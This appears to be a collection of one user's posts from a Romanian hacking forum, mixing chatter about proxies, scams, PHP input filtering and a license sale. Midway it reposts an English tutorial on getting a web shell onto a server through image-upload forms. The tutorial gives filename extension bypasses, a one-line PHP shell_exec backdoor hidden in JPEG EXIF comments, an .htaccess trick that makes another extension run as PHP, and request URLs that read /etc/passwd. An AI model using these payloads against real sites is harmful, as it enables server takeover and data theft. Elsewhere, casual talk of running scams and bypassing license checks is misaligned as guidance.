gafi

http://i.imgur.com/YO9MUXc.jpg

Eu propun ca cei care au 15-20 de posturi sa nu poata deschide un thread, sa nu existe butonul de new thread pentru ei. Sunt foarte multi care doar se inregistreaza si posteaza tot felul de cereri tampite, copii care nu cauta prima data pe google si deschid un thread ca e mai usor asa, mura in gura. Invata, documenteaza-te, munceste !!!! EDIT: ahhaha , mersi pentru corectare!

Off: Sunt curios ce face programul, daca vrei imi spui aici sau PM ON: Foloseste Fiddler2, cauta pe net cum se foloseste, vezi daca te ajuta cu ceva. Daca verifica licenta online, atunci programul asta te va ajuta, sper.

Bani au si tiganii! AI mare dreptate,live your fucking life!!!!

Cati bani vrei sa cheltui pe luna cu proxiurile si ce vrei sa faci cu ele? Mie LimeProxies | Premium Private Proxies | Proxy Solutions mi se par ideale, dar sunt si mai scumpe. Merg si foarte repede si nu sunt spamate.

Cei care stiu sa faca scamu si nu se dau hackeri, nu se lauda, stai linistit, isi fac banu lor acolo fara sa-i stie cineva. Astia sunt niste prapaditi cu 10 clase. Prea mult off topic pe threadul asta, mult continut fara calitate.

Pai poti sa faci o singura interogare sql in loc de 2, si Cat de bine stii mysql? In rest eu nu vad ce altceva poti face!

Sunt curios cum ce metode folositi pentru a evita un atac de tip XSS + SQLI. Eu folosesc htmlentities, mysql_escape_string, stripslashes, htmlspecialchars. Poate am omis ceva, depinde oricum de la site la site, depinde de ce interogari fac. Ma gandeam ca o functie complexa care sa cuprinda toate functiile php de filtrare a XSS sau SQLI ar putea sa incetineasca un site. Sunt curios ce folositi si voi?

Vand CLADG PRO (2 licente) pentru $500 Multumesc

Foarte frumos, bravo. Casa de piatra!

Poti sa faci un print screen cu t= ? Bravo!

Tutorial XSS - invata bine HTML + Javascript. Restul, trebuie sa vina din mintea ta. Ce vrei sa "hackeresti"?

During a website audit, upload forms and other interactive 'user-content' driven facilities are often found to be protected by client side and/or server side security checks. This tutorial presents the methods that can be used to circumvent these security checks. In this case we're specifically considering image uploads that allow JPG files in particular. Each security measure numbered below will be briefly discussed and paired with an appropriate bypass method, this tutorial aims to provide a complete'ish solution. [h=4]1. Client side file verification (with Javascript and/or HTML attributes)[/h] <input name="fileToUpload" type="file" onchange="check_file()" > if($_FILES['userfile']['type'] != "image/jpg") The bypass is trivial, simply rename your shell with an allowed extension/content type by editing the request header data with an intercepting proxy, I like burp, but FF Tamper Data add-on is great too. [h=4]2. A white-list of file extensions is in place so that anything that isn't a picture is DENIED:[/h] $valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png"); Often there will then be some sort of string manipulation to determine the file name and extension of an uploaded file. The strength of this code will determine whether one of the following bypasses will work. Functions like 'strrchr' shown below may play a part in this process and may be passable given a little bit of imagination! $file_extension = strrchr($_FILES["file"]["name"], "."); Here is a list of bypasses: shell.jpg.php (satisfies as check for jpg only) shell.jpg.PhP (obfuscation) shell.php;.jpg (sometimes can ignore whats after ";") shell.php.jpg (the infamous NULL byte which comments out trailing text) shell.php.test (defaults to first recognised extension ignoring "test") shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!) .phtml (a commonly used php parsed extension often forgotten about!) .php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists) [h=4]3.Perform further checks once uploaded to make sure it is a REAL image:[/h][h=4]$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);[/h] The function getimagesize() effectively confirms whether the uploaded file is an image or not. At this point, all the other methods will fail (there are other functions that can be used with a similar goal such as checking image dimensions). The only full-proof solution is to actually upload a real image which will actually pass these checks rather than trying to bypass them. We turn to the trusty JPG file as our example image. There is an amazing amount of information that can be stored in a jpg file along side the actualy image data. EXIF 'meta' data such as the camera model the image was taken on, image descriptions, and comments are editable with progams such as GIMP and even a hex editor. For purposes of this tutorial I use Exif Pilot Create a small image (avatar size) in MSPaint (white background), we can use Exif Pilot to open/edit the file and edit the Exif data- inserting our PHP code into the 'comment' section. See the pic below, I am using my generic 'tiny shell' code to allow me to pass shell commands to the server on the fly. code: <?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?> Now we can upload the jpg file using an extension bypass shown earlier, and it will pass the real image check. To run commands on the server, usage would be: website.com/shell.jpg.php?r0ng=cat /etc/passwd [h=4]4.Found an extension that will upload but its not valid php...[/h]Upload an .htaccess file which sets an arbitrary file extension to be processed as php. If there is already an .htacess file in the image upload directory this should be automatically overwritten. Create a .htaccess file and put the following code, then upload it (replace .mp3 with whatever extension passed). AddType application/x-httpd-php .mp3 Upload your shell as shell.mp3. Then access as: website.com/shell.mp3?r0ng=cat /etc/passwd [h=4][/h][h=4]Sursa: http://hackers2devnull.blogspot.com/2013/05/how-to-shell-server-via-image-upload.html[/h]

Nu vreau contu de steam

O forma, 2 iframe-uri, vezi daca te ajuta si ce ai aici: php - Two different actions on form submit - Stack Overflow cateva modificari si aia e.

Nu facea foarte multi bani, garantat. Trebuie sa ai ceva foarte bine organizat sa faci bani, si din scurt, in 1-2 zile, astfel de erori se depisteaza repede daca faci abuz.

Very very easy.

Sunt curios ce sintaxa ai folosit. Sunt incepator cu xss dar lucrez din greu , daca esti dragut sa-mi dai PM cu sintaxa ta, mi-ar fi de mare ajutor la invatat. Bafta!

Ac. lucru am vrut si eu sa-l zic, este htmlentities(mysql_escape_string()); Dar poate ne inselam. Vrei sa pui functia custom te rog? Sunt curios!

Nu am avut nicio rea intentie sau sa-mi demonstrezi ceva, vroiam doar sa vad pe ce nisa sunt siteurile, te sfatuiam cu ceva. Data viitoare fii mai intelept si nu batos, o sa-ti ajute mai mult. Bafta

arata-ne un site sa-ti dam solutii

Eu platesc cu BRD online!

Si eu il folosesc, foarte util programul pentru cei ce lucreaza cu multe programe deschise odata!

Multumim albertynos :-bd